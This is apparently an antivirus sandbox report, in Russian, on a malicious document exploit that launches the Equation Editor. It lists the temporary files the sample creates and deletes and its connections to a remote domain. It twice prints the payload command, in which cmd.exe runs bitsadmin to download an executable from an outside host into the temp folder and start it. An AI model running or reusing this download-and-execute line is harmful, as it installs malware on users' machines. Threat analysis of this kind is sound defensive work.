Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer Jj /priority foreground https://circle-int.com/_outputD1E650F.exe %TEMP%\xJK.exe && start %TEMP%\xJK.exe
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\cabd432.tmp
- %WINDIR%\temp\tard433.tmp
- %WINDIR%\temp\cabd448.tmp
- %WINDIR%\temp\tard449.tmp
- %WINDIR%\temp\cabe9f6.tmp
- %WINDIR%\temp\tare9f7.tmp
Удаляет следующие файлы
- %WINDIR%\temp\cabd432.tmp
- %WINDIR%\temp\tard433.tmp
- %WINDIR%\temp\cabd448.tmp
- %WINDIR%\temp\tard449.tmp
- %WINDIR%\temp\cabe9f6.tmp
- %WINDIR%\temp\tare9f7.tmp
Сетевая активность
Подключается к
- 'ci###e-int.com':443
UDP
- DNS ASK ci###e-int.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer Jj /priority foreground https://circle-int.com/_outputD1E650F.exe %TEMP%\xJK.exe && start %TEMP%\xJK.exe' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '<SYSTEM32>\bitsadmin.exe' /transfer Jj /priority foreground https://circle-int.com/_outputD1E650F.exe %TEMP%\xJK.exe
